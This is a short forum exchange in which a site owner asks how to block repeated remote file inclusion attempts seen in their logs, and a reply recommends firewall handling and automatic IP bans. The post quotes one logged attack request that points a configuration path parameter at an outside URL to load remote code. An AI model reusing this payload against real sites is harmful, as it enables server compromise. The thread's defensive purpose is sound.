I have regular exceptions detected as Bad Behavior and RFIShield in log.
It repeats several times during 1-2 minutes, probably scheduled bots working. Request looks like: http://my_site//index.php?option=com_content&task=§ionid=&id=&mosConfig.absolute.path=http://bleury.fr/id/tt?_?
These requests are repeating from different IP's locating all over the world - proxies used, I guess, the're allways new.
So, IP blocking isn't useful, can I block it by this request. Will Anti-spam Bad Words do?
By the way WAF is working flawlessly on these exceptions but I'd like to bolster up security in advance.
Thanks.

That's an automated hacking script running against your site. You can't do virtually anything more than having WAF handle it and block it. What I would do is to enable the automatic IP ban, setting a ban of 15 minutes for an IP which causes more than 3 security exceptions every 2 minutes. That's a healthy time for a bot to be effectively stopped and have it skip your site and go try its dodgy attacks on a different site.
